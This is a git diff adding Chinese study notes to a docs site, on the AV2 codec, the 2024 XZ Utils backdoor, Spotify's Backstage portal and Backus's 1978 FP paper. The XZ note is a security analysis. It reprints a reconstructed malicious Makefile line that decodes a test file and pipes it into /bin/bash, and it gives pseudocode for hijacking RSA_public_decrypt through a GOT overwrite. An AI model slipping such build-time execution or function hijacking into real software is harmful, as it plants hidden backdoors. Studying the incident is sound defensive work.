参考实现;dav2d 软解;FFmpeg 集成进行中 | +| 硬件 | 预计 2–4 年消费级普及,短期以云端/PC 软解为主 | + +AV2 不是「换一个文件扩展名」那么简单——它重新定义了块如何切、色度如何跟亮度分工、一个文件如何服务多路观众。作为学习者,先搞懂 **OBU → 序列头 → 帧头 → 瓦片 → 预测/变换/熵编** 这条解码主线,再按需深入 Syntax Browser,比从头到尾通读上千页 PDF 更高效。 + +--- + +## 参考链接 + +- [AV2 Specification 官网](https://av2.aomedia.org/) — v1.0.0 规范、PDF、Syntax Browser、附加表 +- [AV2 v1.0.0 在线规范全文](https://av2.aomedia.org/v1.0.0/index.html) +- [Wikipedia: AV2](https://en.wikipedia.org/wiki/AV2) +- [AOMedia 发布 AV2 新闻稿(2026-06)](https://aomedia.org/press%20releases/Alliance-for-Open-Media-Releases-AV2-Codec/) +- [Andrey Norkin — AV2 Video Codec Architecture Overview](https://norkin.org/research/av2_overview/index.html) +- [AVM 参考软件仓库](https://gitlab.com/AOMediaCodec/avm) +- [dav2d 解码器(VideoLAN)](https://code.videolan.org/videolan/dav2d) diff --git a/src/content/docs/papers/backdoor-xz-liblzma-2024.md b/src/content/docs/papers/backdoor-xz-liblzma-2024.md new file mode 100644 index 000000000..e52f3d269 --- /dev/null +++ b/src/content/docs/papers/backdoor-xz-liblzma-2024.md @@ -0,0 +1,215 @@ +--- +title: XZ Utils 后门事件学习笔记 — 从供应链信任崩塌看 SSH 服务器是如何被攻破的 +来源: https://www.openwall.com/lists/oss-security/2024/03/29/4 +日期: 2026-06-13 +分类: 安全与隐私 +子分类: 安全与隐私 +provenance: pipeline-v3 +--- + +# XZ Utils 后门事件学习笔记 + +## 一、一个日常类比:被污染的"标准件" + +想象你住在一个小区,每家每户的门锁都按照同一份国家标准制造。这份标准由一位德高望重的工程师编写和维护,大家都信任他。 + +某天,一位叫 "Jia Tan" 的人通过多年社交运作,成了这位工程师的"得力助手",最终拿到了修改标准文档的权限。他在标准里偷偷塞了一条:如果你用的是 x86-64 架构的 Linux 系统、用 GCC 编译、并且正在打包成 deb 或 rpm 格式——那就在编译时多跑一段隐藏代码。这段代码会在最终的产品里安装一个"暗门"。 + +问题在于:几乎每个 Linux 发行版都用这份标准。所以暗门随着正常更新,悄悄装进了数亿台机器。 + +这就是 2024 年 3 月震惊世界的 XZ Utils 后门事件。 + +## 二、什么是 XZ Utils 和 liblzma? + +**XZ Utils** 是一套文件压缩工具(类似 gzip、bzip2),核心库叫 **liblzma**。它不是什么"应用软件",而是 Linux 系统里无数软件都会依赖的**底层库**——就像盖房子用的水泥。你看不见它,但房子离不了它。 + +**OpenSSH** 是 Linux 上最常用的远程登录工具。正常情况下,OpenSSH 和 liblzma 根本没有关系。但因为 Debian 等发行版给 OpenSSH 打了一个补丁(用于 systemd 通知功能),让 OpenSSH 间接依赖了 libsystemd,而 libsystemd 又依赖了 liblzma。就这样,两条本不相干的线被连到了一起。 + +## 三、攻击时间线(从第一性原理推导) + +**为什么攻击者要花两年以上的时间?** + +如果直接入侵一个系统,成本高且覆盖面小。但如果污染了一个被所有人使用的"标准件",一次投放,影响全球。这是一种**杠杆思维**:用最小的投入换取最大的影响范围。 + +- **2021 年起**:攻击者 "Jia Tan" 开始以"热心社区贡献者"的身份接触 XZ Utils 项目,使用多个马甲账号(如 "Jigar Kumar"、"krygorin4545")施压原 maintainer,争取提交权限 +- **2024 年 2 月**:拿到权限后,在 XZ 5.6.0 中植入后门代码 +- **2024 年 3 月**:5.6.1 发布,后门随之扩散 +- **2024 年 3 月 27 日**:开发者 Andres Freund 在 Debian sid 上发现 SSH 登录变慢、valgrind 报错,开始调查 +- **2024 年 3 月 29 日**:在 oss-security 邮件列表公开披露 +- **2024 年 5 月 29 日**:正式修复版 5.6.2 发布,CVE-2024-3094,CVSS 评分 10.0(满分) + +## 四、核心概念解析 + +### 4.1 供应链攻击(Supply Chain Attack) + +攻击者不直接攻破目标系统,而是攻击目标系统所依赖的第三方组件。就像不在你家门上动手,而是在送你家的自来水里下毒——所有喝这水的人都会中招。 + +**关键特征**: +- 依赖链长且隐蔽(OpenSSH → libsystemd → liblzma) +- 信任传递(用户信任发行版,发行版信任上游源代码) +- 检测极难(代码看起来是正常的压缩库) + +### 4.2 .ifunc 与运行时函数解析 + +Linux 上的动态库可以用 **IFUNC**(Interface Function)机制,让函数在程序启动时"动态选择"最优实现。比如 crc32/crc64 校验函数会根据 CPU 指令集自动选最快的版本。 + +攻击者利用了这一点:**替换了 ifunc 解析函数**,在程序刚启动、一切还在内存里、防护还没完全生效的时候,执行恶意代码。 + +### 4.3 GOT 覆盖(Global Offset Table) + +程序调用外部函数时,会先查 GOT 表,GOT 表里存的是函数的真实地址。攻击者把 GOT 表中 `RSA_public_decrypt` 的地址改成了指向自己的恶意代码。这样每次 SSH 验证公钥时,走的都是攻击者的逻辑。 + +这就像你去银行取钱,银行系统查"授权经理"的工位时,发现去了一个冒牌经理的座位——冒牌经理说"我批准了",系统就信了。 + +## 五、后门的工作原理(代码示例) + +### 示例 1:构建时注入——通过 makefile 解码并执行隐藏脚本 + +后门的第一阶段发生在**编译阶段**。攻击者修改了发布包中的 `m4/build-to-host.m4` 文件(这个文件在 git 仓库里不存在,只在发布的 tarball 里)。它会在 configure 阶段注入一段恶意指令到 Makefile 中: + +```makefile +# 攻击者注入的恶意 Makefile 规则 +# 当满足条件时(x86-64 + GCC + GNU ld + Debian/RPM 构建), +# 这段规则会在测试阶段触发: + +am__test = bad-3-corrupt_lzma2.xz +am__test_dir = $(top_srcdir)/tests/files/$(am__test) + +# 关键行:在运行测试时,先 sed 处理一个 .xz 文件, +# 再用 xz 解压,最后 piped 到 bash 执行 +sed rpath $(am__test_dir) | \ + tr "\t \-\_" " \t\_-" | \ + xz -d | /bin/bash >/dev/null 2>&1; +``` + +**逐行解读**: +1. `sed rpath ...` — 替换文件中的占位符 +2. `tr "\t \-\_" " \t\_-"` — 字符替换(base64 风格编码) +3. `xz -d` — 用 xz 解压编码后的数据(这里面是真正的恶意脚本) +4. `| /bin/bash` — 把解压出来的内容当作 shell 脚本执行! + +**类比**:就像你在快递盒里发现一个小盒子,打开小盒子发现里面有个自动播放的视频——但视频直接连到了你家电脑的控制台。 + +### 示例 2:运行时劫持——通过 ifunc 解析器替换 GOT 表 + +后门进入编译好的 liblzma.so 后,在程序启动时激活。以 sshd 为例: + +```c +// 正常情况:crc64_resolve() 返回根据 CPU 能力选择的最快 crc64 实现 +static uint64_t (*crc64_resolve)(void) { + // 检测 CPU 是否支持 BMI2 指令集 + if (have_cpuinfo_bmi2()) + return crc64_bmi2; // 用 BMI2 优化版本 + else + return crc64_generic; // 用通用版本 +} + +// 攻击者替换后的 crc64_resolve(): +// 第一次调用:检查条件(CPU 架构、编译器、构建环境等) +// 第二次调用:安装动态链接器审计钩子(audit hook) +// 等待 RSA_public_decrypt 符号被解析 +// 然后把 GOT 表中 RSA_public_decrypt 的地址 +// 指向自己的恶意代码 + +// 恶意解析器的核心逻辑(伪代码): +static uint64_t (*malicious_crc64_resolve)(void) { + static int called_count = 0; + called_count++; + + if (called_count == 1) { + // 第一次:记录环境信息,检查条件 + // 条件包括:build == x86_64-*linux-gnu* + // CC == gcc, linker == GNU ld + // 存在 debian/rules 或 RPM_ARCH == x86_64 + // TERM 未设置、LANG 已设置 + // 如果条件满足,标记为"继续执行" + return normal_cpuid_result(); + } + + if (called_count == 2 && should_execute) { + // 第二次:安装审计钩子到动态链接器 + // 监听所有符号解析事件 + // 当遇到 RSA_public_decrypt 被解析时, + // 修改 GOT 表项,指向后门代码 + inject_audit_hook(); + wait_for_rsa_symbol(); + overwrite_got_entry("RSA_public_decrypt", backdoor_code_address); + remove_audit_hook(); + } + + return normal_crc64_result(); +} +``` + +**运行时发生了什么?** + +``` +sshd 启动 + │ + ├── liblzma.so 加载 + │ │ + │ ├── crc64_resolve() 被动态链接器调用(因为 -Wl,-z,now) + │ │ │ + │ │ ├── 第 1 次调用:检查环境 ✓ 满足条件 + │ │ ├── 第 2 次调用:安装审计钩子 → 拦截符号解析 + │ │ │ │ + │ │ │ ├── 监听 RSA_public_decrypt 解析 + │ │ │ ├── 找到 GOT 表项 + │ │ │ └── 篡改地址 → 指向后门代码 + │ │ │ + │ │ └── 移除审计钩子 + │ │ + │ └── 其他库陆续加载(libcrypto 等) + │ + └── 用户发起 SSH 连接 + │ + ├── sshd 验证客户端公钥 + │ │ + │ ├── 调用 RSA_public_decrypt() ← 实际走到后门代码 + │ │ │ + │ │ ├── 后门代码持有 Ed448 私钥 + │ │ ├── 构造一个"合法的"认证回复 + │ │ └── 绕过正常认证,获得 root 权限 + │ │ + │ └── 正常代码根本不知道自己已经被替换了 +``` + +**类比**:就像银行系统的"授权经理"工位上坐着一个戴着假名牌的冒牌货。每次需要授权时,系统去查那个工位,冒牌货说"批准",系统就照做。没人知道真正的经理已经被关在储藏室里了。 + +## 六、为什么这个后门如此隐蔽? + +1. **两层分发机制**:恶意代码只在 tarball 里(git 仓库是干净的),绕过 git diff 检查 +2. **条件触发**:只在特定环境(x86-64 + gcc + GNU ld + deb/rpm)下激活,研究者用 clang 或 musl 就触发不了 +3. **反调试**:检测到 rr、gdb 等调试环境时自动失效 +4. **延迟激活**:不在 systemd 环境下启动 sshd 时不触发(增加分析难度) +5. **性能退化伪装**:SSH 登录变慢约 0.5 秒,看起来像性能回归而非攻击 + +## 七、修复与影响 + +**修复方式**: +- 发行版回退到 5.5.x 版本 +- Ubuntu 24.04 Beta 延期一周,重新编译所有包 +- 5.6.2 正式移除后门代码 +- GitHub 暂时禁用了项目仓库镜像 + +**长期影响**: +- OpenSSF 和 OpenJS 联合警告:类似社交工程攻击已 targeting JavaScript 项目 +- 引发关于"关键基础设施依赖无偿志愿者"的广泛讨论 +- 安全研究员 Alex Stamos 评价:"这可能是有史以来最广泛、最有效的后门" + +## 八、从零开始理解的要点总结 + +| 概念 | 类比 | 真实含义 | +|------|------|----------| +| 供应链攻击 | 在水库里下毒 | 通过污染上游组件影响所有下游使用者 | +| liblzma | 水泥 | 底层压缩库,被大量软件间接依赖 | +| ifunc | 自动选择最优路线 | 运行时根据 CPU 选择最优函数实现 | +| GOT 覆盖 | 冒牌授权经理 | 修改函数跳转表,让程序执行恶意代码 | +| tarball vs git | 快递盒 vs 工厂日志 | 发布包包含 git 里没有的恶意构建脚本 | +| CVSS 10.0 | 满分危险 | 可远程利用、无需认证、完全控制 | + +## 九、给自己的思考题 + +1. 如果我们无法信任上游开源项目,软件供应链的"信任链"应该在哪里断开? +2. 为什么 5.6.0 到 5.6.1 之间,攻击者要调整 exploit 代码来适配新的栈布局?这说明攻击者当时在应对什么问题? +3. Andres Freund 是在 Debian sid(开发版)上发现的。如果这个后门只影响 stable 版,它可能要更久才会被发现——这对我们理解开源社区的安全响应机制有什么启示? diff --git a/src/content/docs/papers/backstage-spotify-2020.md b/src/content/docs/papers/backstage-spotify-2020.md new file mode 100644 index 000000000..acf285877 --- /dev/null +++ b/src/content/docs/papers/backstage-spotify-2020.md @@ -0,0 +1,317 @@ +--- +title: Backstage — Spotify 的内部开发者门户如何变成开源的「开发工具前台」 +来源: https://backstage.io/blog/2020/03/16/announcing-backstage/ +日期: 2026-06-13 +子分类: 工程文化 +分类: 其他 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象你刚入职一家**大型连锁酒店集团**(这就是 Spotify 规模下的工程组织): + +- **客房部**管入住退房(业务微服务) +- **工程部**管水电空调(Kubernetes、数据库) +- **安保**管监控门禁(可观测、权限) +- **培训部**管新人手册(文档、onboarding) +- 每个部门都有自己的**内部电话分机、纸质表格、独立 App**——没人能一张图说清「这家酒店到底有多少栋楼、哪栋楼谁负责、坏了找谁」。 + +新服务员(新工程师)第一天最常问的三句话: + +1. 「我要改的那个服务在哪?」 +2. 「谁拥有它?依赖什么?」 +3. 「从空仓库到能跑起来,要走哪套流程?」 + +传统答案是:问 Slack、翻 Confluence、收藏十几个书签。Spotify 在 2016 年前后意识到:**工具越来越多,开发者花在「找工具」上的时间也在涨**。于是他们做了 **Backstage**——一个统一的**内部开发者门户(Internal Developer Portal, IDP)**,把目录、脚手架、文档、监控、CI 等能力收进**同一套 UI**。 + +2020 年 3 月 16 日,Spotify 在官方博客 [Announcing Backstage](https://backstage.io/blog/2020/03/16/announcing-backstage/) 宣布把这套系统**开源**。这不是又一个 CI 或监控产品,而是**盖在现有工具之上的「体验层」**——像酒店大堂的前台:各楼层系统不动,但客人永远知道先去哪问。 + +## 这篇「发布」在说什么 + +| 维度 | 内容 | +|------|------| +| 发布方 | Spotify Engineering | +| 时间 | 2020-03-16 开源宣布;2020-09 进入 CNCF Sandbox | +| 定位 | 开源的 **Developer Portal 框架**,围绕中心化 **Software Catalog** | +| Spotify 内部成效(博客数据) | 工程师 onboarding 到第 10 个 PR 的时间 **缩短 55%**;280+ 团队管理 2000+ 后端服务、300+ 网站、4000+ 数据 pipeline、200+ 移动特性 | +| 开源版初期形态 | 可扩展的前端平台 + 逐步补齐 Catalog / Templates / TechDocs;**不是** Spotify 内部 120+ 插件的完整拷贝 | + +博客用三阶段描述路线图(对理解「先有什么、后补什么」很重要): + +1. **Phase 1 — 可扩展前端平台(当时已有)**:统一 UI/UX,用可复用组件把 Jenkins、K8s、文档站等「拼」进同一界面。 +2. **Phase 2 — 管理你的软件资产(随后 2–3 个月)**:Software Catalog 成为中心——创建库、看 K8s 部署状态、查网站测试覆盖率,都在一个门户里完成。 +3. **Phase 3 — 生态(更长期)**:通过开源插件市场,让每家公司按自己的技术栈选配集成——「Kubernetes 之于基础设施」类比为「Backstage 之于开发者体验」。 + +## 为什么值得学(零基础图景) + +如果你只听过 DevOps 工具名(Jenkins、Grafana、Argo CD……)却没见过**平台工程(Platform Engineering)**怎么落地,Backstage 是一个极好的**解剖标本**: + +- 它回答的不是「怎么写代码」,而是**组织变大后,开发者如何不被工具碎片淹没**。 +- 它把「服务是谁的、在哪、依赖谁」从 wiki 搬进**可查询的目录(Catalog)**。 +- 它把「新建项目」从「问老员工 + 抄三个仓库」变成 **Software Templates(脚手架)** 的一键流程。 +- 它把「文档在 Confluence 里腐烂」变成 **TechDocs(docs-like-code)**——Markdown 跟代码同仓,门户里统一渲染。 + +2023 年后的 DORA 报告、大量公司的 IDP 岗位潮,都和这类「**把内部开发者当产品用户**」的思路同频。Backstage 是这条路上**最早被大规模验证的开源实现之一**。 + +与仓库内其他条目的关系: + +- [[dora-state-of-devops-2023]] —— 用数据说明「用户中心 + 平台能力」与交付绩效的关联;Backstage 是平台能力的**一种具体产品形态**。 +- [[chaos-engineering-netflix-2016]] —— Netflix 用实验验证分布式可靠性;Backstage 用目录 + 门户解决**认知与协作可靠性**(找对人、找对服务)。 +- [[projects/backstage]] —— 本仓库对 Backstage **项目本身**的速览;本篇侧重 **2020 官宣语境与概念起源**。 + +## 核心概念 + +### 1. Developer Portal(开发者门户)≠ 又一个 DevOps 工具 + +门户**不替代** CI、监控、Git、K8s;它提供: + +- **统一入口**:一个域名、一套导航、一种搜索体验。 +- **上下文聚合**:打开 `order-service` 详情页,同时看到 CI 状态、最近部署、on-call、文档、依赖图——数据仍来自各工具,只是**视图合并**。 +- **一致交互**:学会创建一种组件,就学会创建所有模板化的组件(Spotify 工程博客强调的 UX 复利)。 + +日常类比:手机上的「控制中心」不发电、不送网,但把 Wi‑Fi、蓝牙、亮度、勿扰收在一个面板里——**减少切换成本**。 + +### 2. Software Catalog(软件目录)—— 全公司的「服务户籍册」 + +Catalog 是 Backstage 的**心脏**。每个软件资产(微服务、网站、库、数据 pipeline、ML 模型等)用一份**实体描述符**登记,通常放在仓库根的 `catalog-info.yaml`。 + +实体有固定「信封」结构:`apiVersion`、`kind`、`metadata`、`spec`。常见 `kind` 包括: + +| Kind | 含义(简化) | +|------|----------------| +| `Component` | 可部署或可消费的软件单元(service、website、library…) | +| `API` | 对外/对内 API 定义(常挂 OpenAPI) | +| `Resource` | 数据库、队列、存储等基础设施资源 | +| `System` | 多个 Component 组成的业务系统 | +| `Domain` | 更高层的业务域 | +| `User` / `Group` | 人员与团队(常从 HR / GitHub 同步) | + +关系字段(如 `dependsOn`、`owner`)让 Catalog 不只是一张表,而是**可画图谱的图数据库**——「这个服务挂了会影响谁」第一次可以机器回答。 + +### 3. Software Templates(软件模板 / Scaffolder)—— 黄金路径按钮 + +2020 年 8 月,Backstage 宣布 [Software Templates](https://backstage.io/blog/2020/08/05/announcing-backstage-software-templates/):开发者选模板 → 填几个字段 → 自动创建仓库、跑首构建、写入 Catalog。 + +价值在于**标准化与自治的平衡**: + +- 团队仍可快速开工(自治) +- 语言、CI、监控接入、目录登记在模板里写死(标准) +- Spotify 内部形容为「几次点击就能在 GKE 上跑 Hello World 微服务」 + +### 4. TechDocs —— 文档跟代码走 + +Spotify 采用 **docs-like-code**:Markdown 放在仓库 `docs/`,CI 用 MkDocs 构建,Backstage 插件集中展示。解决的是「文档链接在 wiki 里指向已删除的分支」这类经典腐烂问题。 + +### 5. Plugins(插件)—— 门户的「App Store」 + +Backstage 前后端都插件化。Spotify **内部**曾有 100+ 集成;开源社区后续发展出 Plugin Marketplace。写一个 React 前端插件 +(可选)Node 后端插件,就能把专有系统接进统一 UI。博客标题 *As simple as writing a plugin* 指的就是这种扩展方式。 + +### 6. 架构一眼(零基础版) + +``` +开发者浏览器 + ↓ +Backstage 前端 (React) —— 各功能由 Plugin 组成 + ↓ +Backstage 后端 (Node) —— Catalog API、Scaffolder、权限、集成 + ↓ +PostgreSQL(Catalog 实体存储)+ 外部系统(GitHub、K8s、CI…) +``` + +你不需要先会 React 才能理解 Backstage;先记住:**Catalog 存元数据,Plugin 拉实时状态,Template 造新仓库**。 + +## 代码示例 + +### 示例 1:在仓库里登记一个 Component(`catalog-info.yaml`) + +这是 Backstage 最常见的「户籍本」文件,通常放在服务仓库根目录,由 Catalog 定期扫描或通过 `Location` 注册: + +```yaml +apiVersion: backstage.io/v1alpha1 +kind: Component +metadata: + name: playlist-api + description: 为用户生成个性化歌单的 REST 服务 + tags: + - java + - rest + annotations: + # 插件常通过 annotation 关联外部系统(示例键名因插件而异) + github.com/project-slug: spotify/playlist-api + backstage.io/techdocs-ref: dir:. +spec: + type: service + lifecycle: production + owner: group:default/audio-platform + system: listening-experience + dependsOn: + - resource:default/playlist-db + - api:default/recommendation-api +``` + +要点: + +- `metadata.name` 是机器引用用的稳定 ID;`owner` 指向 Catalog 里的 `Group`,方便找 on-call 与权限。 +- `dependsOn` 声明依赖后,门户可画依赖图、做影响分析——**前提是团队愿意维护 yaml**(这也是落地难点)。 + +### 示例 2:注册一批 Catalog 实体(`app-config.yaml` 片段) + +本地或公司实例通过 `catalog.locations` 告诉后端「去哪里读 yaml」: + +```yaml +app: + title: Acme Developer Portal + baseUrl: http://localhost:3000 + +backend: + baseUrl: http://localhost:7007 + +catalog: + locations: + # 从 GitHub 组织拉取所有 catalog-info.yaml + - type: url + target: https://github.com/acme-corp/services/blob/main/catalog/all.yaml + # 本地示例实体(开发用) + - type: file + target: ../../examples/entities.yaml +``` + +`all.yaml` 可以是 `Location` 列表,指向各仓库的 `catalog-info.yaml`——**目录是联邦式的**,不要求所有元数据挤在一个大文件里。 + +### 示例 3:Software Template 定义骨架(`template.yaml`) + +模板描述「创建时问用户什么」以及「后台执行哪些步骤」(常用 [Cookiecutter](https://cookiecutter.readthedocs.io/) + 发布到 Git + 注册 Catalog): + +```yaml +apiVersion: scaffolder.backstage.io/v1beta3 +kind: Template +metadata: + name: node-microservice + title: Node.js 微服务(公司黄金路径) + description: 创建带 CI、Dockerfile、catalog-info 的新服务仓库 +spec: + owner: group:default/platform-team + type: service + + parameters: + - title: 基本信息 + required: + - name + - owner + properties: + name: + title: 服务名 + type: string + pattern: '^[a-z0-9-]+$' + owner: + title: 负责团队 + type: string + ui:field: OwnerPicker + + steps: + - id: fetch + name: 拉取模板骨架 + action: fetch:template + input: + url: ./skeleton + values: + name: ${{ parameters.name }} + owner: ${{ parameters.owner }} + + - id: publish + name: 发布到 GitHub + action: publish:github + input: + repoUrl: github.com?owner=acme-corp&repo=${{ parameters.name }} + + - id: register + name: 写入 Software Catalog + action: catalog:register + input: + repoContentsUrl: ${{ steps.publish.output.repoContentsUrl }} + catalogInfoPath: /catalog-info.yaml + + output: + links: + - title: 在 Catalog 中打开 + url: ${{ steps.register.output.entityRef }} +``` + +开发者在前端 `/create` 选这个模板,填 `name` 和 `owner`,后台按 `steps` 顺序执行——**组织最佳实践被编码进模板**,而不是写在 wiki 第 17 页。 + +### 示例 4:最小前端插件(概念代码) + +插件是「把外部系统 UI 嵌进 Backstage」的标准方式。下面是一个只展示某服务 CI 状态的极简 React 插件轮廓(真实项目还需 `createPlugin`、路由注册等样板): + +```tsx +import { useEntity } from '@backstage/plugin-catalog-react'; +import { InfoCard } from '@backstage/core-components'; + +export const CiStatusCard = () => { + const { entity } = useEntity(); + const slug = entity.metadata.annotations?.['github.com/project-slug']; + + // 真实实现会调用 backend 插件去 GitHub API 取数据 + const status = slug ? 'passed' : 'unknown'; + + return ( + +

仓库 {slug ?? '未配置 annotation'}:{status}

+
+ ); +}; +``` + +`useEntity()` 说明插件运行在 **Catalog 实体详情页的上下文里**——这就是为什么先登记 `catalog-info.yaml` 再谈集成:门户需要知道「当前在看哪个服务」。 + +## Spotify 内部 vs 2020 开源版:别混淆 + +官宣博客特意强调:内部 Backstage 已演进约四年,**开源首版是「有潜力的壳」**,不是 Spotify 内网的完整克隆。 + +| 维度 | Spotify 内部(2020 前后) | 开源版(2020 起) | +|------|---------------------------|-------------------| +| 插件数量 | 100+ / 后增至 120+ | 需自行安装社区或自研插件 | +| 模板 | 深度集成 GHE、Jenkins、GKE 等 | 提供示例,需按自己栈改造 | +| 目标 | 服务 Spotify 工程师 | 让**任何公司**能搭建自己的门户 | + +理解这一点,就不会抱怨「为什么装完开源 Backstage 没有监控页」——**门户框架给你,具体内容要你或社区用插件填满**。 + +## 落地时要记住的坑 + +1. **Catalog 质量 = 组织纪律**:yaml 不更新,门户会展示僵尸服务;需要治理(CI 校验、对账、owner 轮换流程)。 +2. **不是小团队的银弹**:服务 < 20、工具 < 5 时,维护门户的固定成本可能高于收益。 +3. **插件与版本升级**:Backstage monorepo 大版本升级常波及插件 API,生产环境宜锁版本、分批升级。 +4. **成功指标要业务化**:Spotify 用「到第 10 个 PR 的时间」衡量 onboarding——你也可以定义「新服务从创建到首次生产部署的时长」等可观测指标,而不是「门户 PV」。 + +## 时间线(便于记忆) + +| 时间 | 事件 | +|------|------| +| ~2016 | Spotify 内部开始建设开发者门户雏形 | +| 2018 | 内部 Backstage 成型,工程师自发采用 | +| 2020-03-16 | 开源宣布(本篇来源博客) | +| 2020-08 | Software Templates 功能发布 | +| 2020-09 | 进入 CNCF Sandbox | +| 2021+ | Catalog、TechDocs、K8s 插件等逐步 beta/GA;社区与商业托管(如 Roadie)兴起 | +| 2022 | 晋升 CNCF Incubating | + +## 学到什么(零基础带走的 4 句话) + +1. **Backstage 解决的是「认知与协作税」**,不是替代你的 CI/CD。 +2. **Software Catalog 把「谁拥有、依赖谁」变成数据**,是平台工程的地基。 +3. **Templates 把组织标准executable 化**,比 wiki 更难被绕过。 +4. **插件化让门户可长成你想要的样子**——Spotify 开源的是「盖楼框架」,不是「精装样板间」。 + +## 延伸阅读 + +- 官宣原文:[Announcing Backstage](https://backstage.io/blog/2020/03/16/announcing-backstage/) +- Spotify 工程博客:[What the heck is Backstage anyway?](https://engineering.atspotify.com/2020/03/what-the-heck-is-backstage-anyway) +- 软件目录描述符:[Descriptor Format](https://backstage.io/docs/features/software-catalog/descriptor-format) +- 模板功能:[Announcing Backstage Software Templates](https://backstage.io/blog/2020/08/05/announcing-backstage-software-templates/) +- 仓库内项目速览:[[projects/backstage]] +- 关联工具:[[kubernetes]]、[[jenkins]]、[[grafana]]、[[argocd]] + +## 反向链接 + + diff --git a/src/content/docs/papers/backus-fp-1978.md b/src/content/docs/papers/backus-fp-1978.md new file mode 100644 index 000000000..f2855e173 --- /dev/null +++ b/src/content/docs/papers/backus-fp-1978.md @@ -0,0 +1,257 @@ +--- +title: Can Programming Be Liberated from the von Neumann Style? — Backus 1978 函数式编程宣言 +来源: https://www.cs.cmu.edu/~crary/819-f09/Backus78.pdf +日期: 2026-06-13 +子分类: 类型与 PL 理论 +分类: 编程语言 +难度: 入门 +provenance: pipeline-v3 +--- + +## 是什么 + +1977 年,**John Backus** 在图灵奖演讲里问了一个后来影响半个多世纪的问题:**编程能不能从冯·诺依曼风格里解放出来?** 演讲全文以 *Can Programming Be Liberated from the von Neumann Style? A Functional Style and Its Algebra of Programs* 为题,发表于 *Communications of the ACM* 1978 年 8 月(Vol. 21, No. 8, pp. 613–641)。 + +Backus 是 **FORTRAN** 的主要设计者,也是 **BNF(巴科斯-瑙尔范式)** 里那个 B 的来源。这篇论文因此格外刺眼:不是局外人批评主流,而是「造了主流语言的人」在图灵奖讲台上说——**我们三十年来走的那条路,又胖又弱,而且可能走错了方向。** + +日常类比:想象你在装修厨房。冯·诺依曼式编程像**每次只搬一块瓷砖**穿过一条窄门(CPU 与内存之间的「冯·诺依曼瓶颈」),还要在门两边反复登记「这块砖放在第几行第几列」。你真正想表达的是「铺好一整面墙」,但语言和机器逼你整天琢磨**地址、循环变量、赋值语句**。Backus 提议的函数式风格则像**用预制模块拼墙**:transpose(转置)、map(逐元素应用)、reduce(折叠)这些「组合子」像标准卡扣,先把小模块扣在一起,再扣成大模块——你思考的是**数据变换的形状**,而不是「下一个字该写进哪个格子」。 + +论文不只是喊口号。它提出了一套假想语言 **FP(Functional Programming)**、一套可机械推导的 **程序代数(algebra of programs)**,以及一类叫 **AST(Applicative State Transition)** 的计算系统草图——把「有状态」和「无变量函数式」拆开,各取所长。 + +## 历史背景 + +| 时间 | 事件 | +|------|------| +| 1945 | 冯·诺依曼等人提出存储程序计算机架构 | +| 1954–1957 | Backus 领导 IBM 团队开发 FORTRAN | +| 1959 | Backus 在巴黎会议上首次用形式化记号描述语言语法(BNF 前身) | +| 1960 | 参与 ALGOL 60 设计 | +| 1977-10 | 西雅图 ACM 年会颁发图灵奖,Backus 发表演讲 | +| 1978-08 | 扩展版论文发表于 CACM | + +同一时期的相关脉络: + +- **结构化编程**(Dijkstra 的 `goto` 批判、Bohm-Jacopini 定理)在收拾**控制流**的混乱,但 Backus 认为这没碰到根子——**字逐字(word-at-a-time)+ 赋值** 才是病根。 +- **Lisp / λ 演算** 已是「应用式模型」,但 Backus 批评纯 Lisp 常被埋在带赋值、带状态的扩展里,且 λ 替换的「无限自由」不利于形成**少量固定组合子 + 代数定律** 的编程习惯。 +- **APL**(Iverson)被 Backus 视为「跳出字逐字」的重要一步,但仍困在「表达式世界 vs 语句世界」的分裂里。 + +## 为什么重要 + +不理解这篇 1978 年的长文,下面这些事很难放在同一张地图上: + +- 为什么后来 Haskell、Clojure、Scala 总爱谈 **map / fold / compose**,而不只是「没有 `for` 循环」 +- 为什么 **MapReduce** 的 `map` + `reduce` 名字直接来自 Backus 论文里的 **α(ApplyToAll)** 和 **/(Insert)** +- 为什么 **React** 早期宣传「声明式 UI」时,常被追溯到 FP 传统(数据流 + 组合),而不是 imperative DOM 修补 +- 为什么 PL 研究者会说 **「表达式有代数,语句没有」**——这是 Backus 对赋值语句分裂两个世界的经典诊断 +- 为什么 **数据流机、_reduction 机器_、某些 GPU 编程模型** 会被描述为「弱化冯·诺依曼瓶颈」——Backus 在文末明确把语言困境和**体系结构创新**绑在一起 + +更重要的是:**Backus 把「证明程序正确」从逻辑谓词世界拉回到「程序自己的代数」**——像解一元一次方程那样,在**同一种记号**里变形程序,而不是另起一套公理语义。 + +## 核心概念 + +### 1. 三类计算模型(粗分类) + +Backus 用四个维度给模型画像:**数学基础是否简洁、是否历史敏感(有存储)、语义是状态转移还是归约、程序是否利于人类推理**。 + +| 类别 | 例子 | 历史敏感? | 语义 | 程序清晰度 | +|------|------|------------|------|------------| +| 简单操作模型 | 图灵机 | 是 | 状态转移(状态极简) | 差 | +| **应用式模型** | λ 演算、纯 Lisp、**FP** | 否 | **归约**(无状态) | 好 | +| **冯·诺依曼模型** | 典型 CPU + C/Fortran/Java | 是 | 状态转移(状态复杂) | 中等 | + +函数式编程在 Backus 笔下首先是**应用式模型**里的一种**纪律化**风格:故意不用 λ 的任意抽象,而只用**固定组合子(functional forms)**。 + +### 2. 冯·诺依曼瓶颈与赋值语句 + +硬件上,CPU 与存储之间有一条一次只能传**一个字**的通道——Backus 称之为 **von Neumann bottleneck**。更糟的是,这条瓶颈变成了**思维瓶颈**:程序员被迫用循环 + 下标 + 赋值,**一次改存储器里一个词**,才能做出「向量内积」「矩阵乘」这种概念上一步的事。 + +**赋值语句**是语言侧的瓶颈: + +- 右边是**表达式世界**——有代数性质,算「值」 +- 左边及整条语句链是**语句世界**——围绕「改状态」,数学性质弱,结构化编程只能稍微收拾场面 + +两边分裂后,**表达式里的组合子**就算再强,也只能产出「一个字」,还得靠语句世界拼成整体结果。 + +### 3. 框架(framework)vs 可变部分(changeable parts) + +Algol 的 `for`、`while` 写死在语言**框架**里;用户自定义函数只是**可变部分**,表达力弱。Backus 梦想相反的结构:**极小框架 + 极强的可变部分**——可变部分靠**组合子**从旧函数拼出新函数,而不必改语言内核。 + +冯·诺依曼语言之所以框架臃肿,是因为**语义与状态紧密耦合**:每个特性都要写进状态转移规则,于是 manual 越写越厚(他讽刺 DoD 语言标准可能上千页)。 + +### 4. 组合子(functional forms / combining forms) + +FP 里函数都是 **object → object**,且 **⊥-preserving**(遇到未定义则传播未定义)。用组合子把函数粘起来,例如: + +| 记号 | 名称 | 含义(直观) | 